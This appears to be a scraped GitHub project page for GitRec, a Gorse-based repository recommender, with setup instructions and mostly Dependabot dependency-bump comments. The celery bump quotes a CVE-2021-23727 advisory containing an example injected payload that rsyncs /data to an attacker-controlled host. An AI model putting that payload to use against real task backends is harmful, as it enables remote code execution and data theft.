A TikTok-like recommender system for GitHub repositories based on Gorse

Overview

GitRec

Website DeepSource

GitRec is the missing recommender system for GitHub repositories based on Gorse.

Architecture

  • The trending crawler crawls trending repositories and insert them into Gorse as new items.
  • The user starred crawler crawls user starred repositories and insert them into Gorse as new feedback.
  • GitRec web service pulls recommendations from Gorse and show to users. It also submits a crawling request to the user starred crawler when a new user signed in.

Quick Start

  • First, clone the repository and enter the folder.
git clone https://github.com/zhenghaoz/gitrec.git
cd gitrec
GITHUB_ACCESS_TOKEN: # personal access token
  • Create a GitHub OAuth app. The authorization callback URL should be http://127.0.0.1:5000/login/github/authorized. Then, fill following variables in docker-compose.yml.
GITHUB_OAUTH_CLIENT_ID: # client ID
GITHUB_OAUTH_CLIENT_SECRET: # client secret
SECRET_KEY: # random string
  • Start the cluster using Docker Compose.
docker-compose up -d
  • Download the SQL file github.sql and import to the MySQL instance.
mysql -h 127.0.0.1 -u root -proot_pass gorse < github.sql
  • Restart the master node to apply imported data.
docker-compose restart
  • Play with GitRec:
Entry Link
GitRec http://127.0.0.1:5000/
Master Dashboard http://127.0.0.1:8088/
Server RESTful API http://127.0.0.1:8087/apidocs
Server Prometheus Metrics http://127.0.0.1:8087/metrics
Worker Prometheus Metrics http://127.0.0.1:8089/metrics
Comments
  • Bump async from 2.6.3 to 2.6.4 in /frontend

    Bump async from 2.6.3 to 2.6.4 in /frontend

    Bumps async from 2.6.3 to 2.6.4.

    Changelog

    Sourced from async's changelog.

    v2.6.4

    • Fix potential prototype pollution exploit (#1828)
    Commits
    Maintainer changes

    This version was pushed to npm by hargasinski, a new releaser for async since your current version.


    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump url-parse from 1.5.3 to 1.5.7 in /frontend

    Bump url-parse from 1.5.3 to 1.5.7 in /frontend

    Bumps url-parse from 1.5.3 to 1.5.7.

    Commits
    • 8b3f5f2 1.5.7
    • ef45a13 [fix] Readd the empty userinfo to url.href (#226)
    • 88df234 [doc] Add soft deprecation notice
    • 78e9f2f [security] Fix nits
    • e6fa434 [security] Add credits for incorrect handling of userinfo vulnerability
    • 4c9fa23 1.5.6
    • 7b0b8a6 Merge pull request #223 from unshiftio/fix/at-sign-handling-in-userinfo
    • e4a5807 1.5.5
    • 193b44b [minor] Simplify whitespace regex
    • 319851b [fix] Remove CR, HT, and LF
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump follow-redirects from 1.14.0 to 1.14.7 in /frontend

    Bump follow-redirects from 1.14.0 to 1.14.7 in /frontend

    Bumps follow-redirects from 1.14.0 to 1.14.7.

    Commits
    • 2ede36d Release version 1.14.7 of the npm package.
    • 8b347cb Drop Cookie header across domains.
    • 6f5029a Release version 1.14.6 of the npm package.
    • af706be Ignore null headers.
    • d01ab7a Release version 1.14.5 of the npm package.
    • 40052ea Make compatible with Node 17.
    • 86f7572 Fix: clear internal timer on request abort to avoid leakage
    • 2e1eaf0 Keep Authorization header on subdomain redirects.
    • 2ad9e82 Carry over Host header on relative redirects (#172)
    • 77e2a58 Release version 1.14.4 of the npm package.
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump celery from 5.0.5 to 5.2.2

    Bump celery from 5.0.5 to 5.2.2

    Bumps celery from 5.0.5 to 5.2.2.

    Release notes

    Sourced from celery's releases.

    5.2.2

    Release date: 2021-12-26 16:30 P.M UTC+2:00

    Release by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      {
            "exc_module": "os",
            'exc_type': "system",
            "exc_message": "rsync /data [email protected]:~/data"
      }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    v5.2.1

    Release date: 2021-11-16 8.55 P.M UTC+6:00

    Release by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.
    • Change pytz>dev to a PEP 440 compliant pytz>0.dev.0.

    ... (truncated)

    Changelog

    Sourced from celery's changelog.

    5.2.2

    :release-date: 2021-12-26 16:30 P.M UTC+2:00 :release-by: Omer Katz

    • Various documentation fixes.

    • Fix CVE-2021-23727 (Stored Command Injection security vulnerability).

      When a task fails, the failure information is serialized in the backend. In some cases, the exception class is only importable from the consumer's code base. In this case, we reconstruct the exception class so that we can re-raise the error on the process which queried the task's result. This was introduced in #4836. If the recreated exception type isn't an exception, this is a security issue. Without the condition included in this patch, an attacker could inject a remote code execution instruction such as: os.system("rsync /data [email protected]:~/data") by setting the task's result to a failure in the result backend with the os, the system function as the exception type and the payload rsync /data [email protected]:~/data as the exception arguments like so:

      .. code-block:: python

        {
              "exc_module": "os",
              'exc_type': "system",
              "exc_message": "rsync /data [email protected]:~/data"
        }
      

      According to my analysis, this vulnerability can only be exploited if the producer delayed a task which runs long enough for the attacker to change the result mid-flight, and the producer has polled for the task's result. The attacker would also have to gain access to the result backend. The severity of this security vulnerability is low, but we still recommend upgrading.

    .. _version-5.2.1:

    5.2.1

    :release-date: 2021-11-16 8.55 P.M UTC+6:00 :release-by: Asif Saif Uddin

    • Fix rstrip usage on bytes instance in ProxyLogger.
    • Pass logfile to ExecStop in celery.service example systemd file.
    • fix: reduce latency of AsyncResult.get under gevent (#7052)
    • Limit redis version: <4.0.0.
    • Bump min kombu version to 5.2.2.

    ... (truncated)

    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    • @dependabot use these labels will set the current labels as the default for future PRs for this repo and language
    • @dependabot use these reviewers will set the current reviewers as the default for future PRs for this repo and language
    • @dependabot use these assignees will set the current assignees as the default for future PRs for this repo and language
    • @dependabot use this milestone will set the current milestone as the default for future PRs for this repo and language

    You can disable automated security fix PRs for this repo from the Security Alerts page.

    dependencies python 
    opened by dependabot[bot] 1
  • Add master node restart cmd

    Add master node restart cmd

    In the gorse docs(https://docs.gorse.io/ch01-01-installation.html), it is suggested to restart the master node to apply changes.

    I guess this project probably should follow the manual as well. Not sure.

    opened by jiyolla 1
  • #19 9.900 ERROR: Could not install packages due to an OSError: HTTPSConnectionPool(host='files.pythonhosted.org', port=443): Max retries exceeded with url: /packages/80/f1/cd7626c763e58f967317023c3dd01a2fab5d6f00f8e1c672ccceb3aae5cb/amqp-5.0.6-py3-none-any.whl (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1129)')))

    #19 9.900 ERROR: Could not install packages due to an OSError: HTTPSConnectionPool(host='files.pythonhosted.org', port=443): Max retries exceeded with url: /packages/80/f1/cd7626c763e58f967317023c3dd01a2fab5d6f00f8e1c672ccceb3aae5cb/amqp-5.0.6-py3-none-any.whl (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1129)')))

    #19 9.900 ERROR: Could not install packages due to an OSError: HTTPSConnectionPool(host='files.pythonhosted.org', port=443): Max retries exceeded with url: /packages/80/f1/cd7626c763e58f967317023c3dd01a2fab5d6f00f8e1c672ccceb3aae5cb/amqp-5.0.6-py3-none-any.whl (Caused by SSLError(SSLCertVerificationError(1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self signed certificate in certificate chain (_ssl.c:1129)')))

    opened by xiazemin 1
  • Bump eslint-plugin-vue from 6.2.2 to 7.13.0 in /frontend

    Bump eslint-plugin-vue from 6.2.2 to 7.13.0 in /frontend

    Bumps eslint-plugin-vue from 6.2.2 to 7.13.0.

    Release notes

    Sourced from eslint-plugin-vue's releases.

    v7.13.0

    ✨ Enhancements

    • Supports <script setup>
      • #1529 Added vue/script-setup-uses-vars rule that will find variables in <script setup> used in \<template> and mark them as used.
      • #1559 Added vue/no-export-in-script-setup rule that disallows ES export in <script setup>.
      • #1560 Added vue/valid-define-props rule that reports defineProps compiler macros in the following cases:
        • defineProps are referencing locally declared variables.
        • defineProps has both a literal type and an argument. e.g. defineProps<{/*props*/}>({/*props*/})
        • defineProps has been called multiple times.
        • Props are defined in both defineProps and export default {}.
        • Props are not defined in either defineProps or export default {}.
      • #1561 Added vue/valid-define-emits rule that reports defineEmits compiler macros in the following cases:
        • defineEmits are referencing locally declared variables.
        • defineEmits has both a literal type and an argument. e.g. defineEmits<(e: 'foo')=>void>(['bar'])
        • defineEmits has been called multiple times.
        • Custom events are defined in both defineEmits and export default {}.
        • Custom events are not defined in either defineEmits or export default {}.
      • #1532, #1559 Upgraded vue-eslint-parser.
      • Updated rules to support <script setup>.
        • #1531 vue/no-mutating-props rule.
        • #1535 vue/no-reserved-keys rule.
        • #1533 vue/no-async-in-computed-properties rule.
        • #1534 vue/no-side-effects-in-computed-properties rule.
        • #1536 vue/require-prop-type-constructor rule.
        • #1539 vue/no-lifecycle-after-await rule.
        • #1538 vue/require-valid-default-prop rule.
        • #1542 vue/return-in-emits-validator rule.
        • #1545 vue/require-default-prop rule.
        • #1540 vue/no-setup-props-destructure rule.
        • #1541 vue/no-watch-after-await rule.
        • #1543 vue/no-template-shadow rule.
        • #1544 vue/prop-name-casing rule.
        • #1546 vue/require-prop-types rule.
        • #1548 vue/require-explicit-emits rule.
        • #1549 vue/custom-event-name-casing rule.
        • #1550 vue/no-boolean-default rule.
        • #1551 vue/no-restricted-call-after-await rule.
        • #1552 vue/no-restricted-props rule.
        • #1553 vue/no-unregistered-components rule.
        • #1554 vue/no-unsupported-features rule.
        • #1555 vue/no-unused-properties rule.
        • #1556 vue/no-unused-refs rule.
        • #1557 vue/require-emit-validator rule.
        • #1558 vue/require-name-property rule.

    🐛 Bug Fixes

    • #1527 Changed the indent rule so that the union type has the same indent as the binary expression.

    ... (truncated)

    Commits
    • 0ee61cc 7.13.0
    • 3cda46b Update docs related to \<script setup>. (#1530)
    • 90cd61e Add vue/valid-define-emits rule (#1561)
    • 9822094 Add vue/no-export-in-script-setup rule (#1559)
    • fbf0194 Add vue/valid-define-props rule (#1560)
    • e5f0258 Update vue/require-name-property rule to support \<script setup> (#1558)
    • 1447444 Update vue/require-emit-validator rule to support \<script setup> (#1557)
    • 4e575ea Update vue/no-unused-refs rule to support setup() and \<script setup> (#...
    • fed7f4e Update vue/no-unused-properties rule to support \<script setup> (#1555)
    • d47de39 Update vue/no-unsupported-features rule to support \<script setup> (#1554)
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump importlib-metadata from 4.0.1 to 4.6.1

    Bump importlib-metadata from 4.0.1 to 4.6.1

    Bumps importlib-metadata from 4.0.1 to 4.6.1.

    Changelog

    Sourced from importlib-metadata's changelog.

    v4.6.1

    • #327: Deprecation warnings now honor call stack variance on PyPy.

    v4.6.0

    • #326: Performance tests now rely on pytest-perf <https://pypi.org/project/pytest-perf>_. To disable these tests, which require network access and a git checkout, pass -p no:perf to pytest.

    v4.5.0

    • #319: Remove SelectableGroups deprecation exception for flake8.

    v4.4.0

    • #300: Restore compatibility in the result from Distribution.entry_points (EntryPoints) to honor expectations in older implementations and issuing deprecation warnings for these cases:

      • EntryPoints objects are once again mutable, allowing for sort() and other list-based mutation operations. Avoid deprecation warnings by casting to a mutable sequence (e.g. list(dist.entry_points).sort()).

      • EntryPoints results once again allow for access by index. To avoid deprecation warnings, cast the result to a Sequence first (e.g. tuple(dist.entry_points)[0]).

    v4.3.1

    • #320: Fix issue where normalized name for eggs was incorrectly solicited, leading to metadata being unavailable for eggs.

    v4.3.0

    • #317: De-duplication of distributions no longer requires

    ... (truncated)

    Commits
    • 596155c Adjust for variable stacklevel on partial calls in PyPy. Fixes #327.
    • b49cdaa Update changelog.
    • c83cdb4 Merge pull request #326 from python/feature/pytest-perf
    • 6dfb530 Ignore exercises.py in coverage.
    • dadbb4f Bump to pytest-perf 0.9.2 with bugfix for module collection.
    • 1937287 Bump to pytest-perf 0.9.1 with bugfix for module collection.
    • f0d021a ⚫ Fade to black.
    • 5f08b8d Rely on pytest_perf 0.9 and the new Python syntax.
    • 6ed9128 Bump to pytest-perf 0.6.2 and remove ipython from testing reqs.
    • e34a81e Merge branch 'main' into feature/pytest-perf
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump core-js from 3.11.1 to 3.15.2 in /frontend

    Bump core-js from 3.11.1 to 3.15.2 in /frontend

    Bumps core-js from 3.11.1 to 3.15.2.

    Changelog

    Sourced from core-js's changelog.

    3.15.2 - 2021.06.29
    • Worked around breakage related to zone.js loaded before core-js, #953
    • Added NodeJS 16.4 -> Chrome 91 compat data mapping
    3.15.1 - 2021.06.23
    • Fixed cloning of regex through RegExp constructor, #948
    3.15.0 - 2021.06.21
    • Added RegExp named capture groups polyfill, #521, #944
    • Added RegExp dotAll flag polyfill, #792, #944
    • Added missed polyfills of Annex B features (required mainly for some non-browser engines), #336, #945:
      • escape
      • unescape
      • String.prototype.substr
      • Date.prototype.getYear
      • Date.prototype.setYear
      • Date.prototype.toGMTString
    • Fixed detection of forbidden host code points in URL polyfill
    • Allowed rhino target in core-js-compat / core-js-builder, added compat data for rhino 1.7.13, #942, thanks @​gausie
    • .at marked as supported from FF90
    3.14.0 - 2021.06.05
    • Added polyfill of stable sort in { Array, %TypedArray% }.prototype.sort, #769, #941
    • Fixed Safari 14.0- %TypedArray%.prototype.sort validation of arguments bug
    • .at marked as supported from V8 9.2
    3.13.1 - 2021.05.29
    • Overwrites get-own-property-symbols third-party Symbol polyfill if it's used since it causes a stack overflow, #774
    • Added a workaround of possible browser crash on Object.prototype accessors methods in WebKit ~ Android 4.0, #232
    3.13.0 - 2021.05.26
    3.12.1 - 2021.05.09
    • Fixed some cases of Function#toString with multiple core-js instances
    • Fixed some possible String#split polyfill problems in V8 5.1
    3.12.0 - 2021.05.06
    3.11.3 - 2021.05.05
    • Native promise-based APIs Promise#{ catch, finally } returns polyfilled Promise instances when it's required
    3.11.2 - 2021.05.03
    • Added a workaround of WebKit ~ iOS 10.3 Safari Promise bug, #932
    • Promise#then of incorrect native Promise implementations with correct subclassing no longer wrapped
    • Changed the order of Promise feature detection, removed unhandled rejection tracking check in non-browser non-node platforms
    Commits

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • Bump importlib-metadata from 4.0.1 to 4.6.0

    Bump importlib-metadata from 4.0.1 to 4.6.0

    Bumps importlib-metadata from 4.0.1 to 4.6.0.

    Changelog

    Sourced from importlib-metadata's changelog.

    v4.6.0

    • #326: Performance tests now rely on pytest-perf <https://pypi.org/project/pytest-perf>_. To disable these tests, which require network access and a git checkout, pass -p no:perf to pytest.

    v4.5.0

    • #319: Remove SelectableGroups deprecation exception for flake8.

    v4.4.0

    • #300: Restore compatibility in the result from Distribution.entry_points (EntryPoints) to honor expectations in older implementations and issuing deprecation warnings for these cases:

      • EntryPoints objects are once again mutable, allowing for sort() and other list-based mutation operations. Avoid deprecation warnings by casting to a mutable sequence (e.g. list(dist.entry_points).sort()).

      • EntryPoints results once again allow for access by index. To avoid deprecation warnings, cast the result to a Sequence first (e.g. tuple(dist.entry_points)[0]).

    v4.3.1

    • #320: Fix issue where normalized name for eggs was incorrectly solicited, leading to metadata being unavailable for eggs.

    v4.3.0

    • #317: De-duplication of distributions no longer requires loading the full metadata for PathDistribution objects, entry point loading performance by ~10x.

    v4.2.0

    ... (truncated)

    Commits
    • b49cdaa Update changelog.
    • c83cdb4 Merge pull request #326 from python/feature/pytest-perf
    • 6dfb530 Ignore exercises.py in coverage.
    • dadbb4f Bump to pytest-perf 0.9.2 with bugfix for module collection.
    • 1937287 Bump to pytest-perf 0.9.1 with bugfix for module collection.
    • f0d021a ⚫ Fade to black.
    • 5f08b8d Rely on pytest_perf 0.9 and the new Python syntax.
    • 6ed9128 Bump to pytest-perf 0.6.2 and remove ipython from testing reqs.
    • e34a81e Merge branch 'main' into feature/pytest-perf
    • 14f2a68 Move ipython to performance test extra.
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies python 
    opened by dependabot[bot] 1
  • Bump eslint-plugin-vue from 6.2.2 to 7.12.1 in /frontend

    Bump eslint-plugin-vue from 6.2.2 to 7.12.1 in /frontend

    Bumps eslint-plugin-vue from 6.2.2 to 7.12.1.

    Release notes

    Sourced from eslint-plugin-vue's releases.

    v7.12.1

    :bug: Bug Fixes

    • #1525 Fixed false positives for trailing comma with import in vue/script-indent rule.

    v7.12.0

    ✨ Enhancements

    • #1520 Improved vue/script-indent rule to support TypeScript syntax.
    • #1481 Improved vue/script-indent rule and vue/html-indent rule to support ES2022 Class Fields syntax. (When using espree v8+.)

    🐛 Bug Fixes

    • #1521 Fixed wrong auto-fix in vue/no-deprecated-slot-attribute rule and vue/no-deprecated-slot-scope-attribute rule.
    • #1522 Fixed false positives for default with type Function in vue/no-deprecated-props-default-this rule.

    ⚙️ Updates

    • #1481 Supports ES2022 Class Fields. (When using espree v8+.)

    All commits: v7.11.1 -> v7.12.0

    v7.11.1

    :bug: Bug Fixes

    • #1515 Fixed crash when using objectsInObjects option in vue/object-curly-spacing rule.

    v7.11.0

    ✨ Enhancements

    New Rules:

    • #1506 Added vue/no-this-in-before-route-enter rule that disallow this usage in a beforeRouteEnter method.
    • #1510 Added vue/no-deprecated-v-is rule that disallow deprecated v-is directive (in Vue.js 3.1.0+).

    Other changes in Rules:

    • #1501 Made vue/no-deprecated-destroyed-lifecycle rule to auto-fixable.

    ⚙️ Updates

    • #1509 Added supports for is="vue:" (Vue 3.1.0+).

    All commits: v7.10.0 -> v7.11.0

    ... (truncated)

    Commits
    • 49d34c9 7.12.1
    • 2bb5279 Fix false positives for trailing comma with import in vue/script-indent rul...
    • 4a86231 7.12.0
    • 94db4a6 Fix false positives for default with type Function in `vue/no-deprecated-prop...
    • 28dec65 Fix that vue/no-deprecated-slot-attribute and `vue/no-deprecated-slot-scope...
    • f2b9ccc Improved indent rules to support TypeScript syntax (#1520)
    • a969878 Supports ES2022 (Class Fields) (#1481)
    • 384dae0 7.11.1
    • 9d54bd6 Fix crash when using objectsInObjects option in vue/object-curly-spacing ...
    • 68b7502 7.11.0
    • Additional commits viewable in compare view

    Dependabot compatibility score

    Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


    Dependabot commands and options

    You can trigger Dependabot actions by commenting on this PR:

    • @dependabot rebase will rebase this PR
    • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
    • @dependabot merge will merge this PR after your CI passes on it
    • @dependabot squash and merge will squash and merge this PR after your CI passes on it
    • @dependabot cancel merge will cancel a previously requested merge and block automerging
    • @dependabot reopen will reopen this PR if it is closed
    • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
    • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
    • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
    dependencies javascript 
    opened by dependabot[bot] 1
  • The frontend is stuck on loading

    The frontend is stuck on loading

    Hi, first thank you for sharing this project.

    I followed the instructions on readme, but the apps seems to stuck on the loading page.

    image

    The master node seems to be working. I can visit the gorse dashboard. The user count shows 1, and other metrics all 0.

    What shall I do?

    opened by jiyolla 0
Releases(v0.5)
Python library to receive live stream events like comments and gifts in realtime from TikTok LIVE.

TikTokLive A python library to connect to and read events from TikTok's LIVE service A python library to receive and decode livestream events such as

Isaac Kogan 277 Dec 23, 2022
A Real-World Benchmark for Reinforcement Learning based Recommender System

RL4RS: A Real-World Benchmark for Reinforcement Learning based Recommender System RL4RS is a real-world deep reinforcement learning recommender system

null 121 Dec 1, 2022
A python library for implementing a recommender system

python-recsys A python library for implementing a recommender system. Installation Dependencies python-recsys is build on top of Divisi2, with csc-pys

Oscar Celma 1.5k Dec 17, 2022
Fashion Recommender System With Python

Fashion-Recommender-System Thr growing e-commerce industry presents us with a la

Omkar Gawade 2 Feb 2, 2022
Collect super-resolution related papers, data, repositories

Collect super-resolution related papers, data, repositories

WangChaofeng 1.7k Jan 3, 2023
An off-line judger supporting distributed problem repositories

Thaw 中文 | English Thaw is an off-line judger supporting distributed problem repositories. Everyone can use Thaw release problems with license on GitHu

countercurrent_time 2 Jan 9, 2022
git git《Transformer Meets Tracker: Exploiting Temporal Context for Robust Visual Tracking》(CVPR 2021) GitHub:git2] 《Masksembles for Uncertainty Estimation》(CVPR 2021) GitHub:git3]

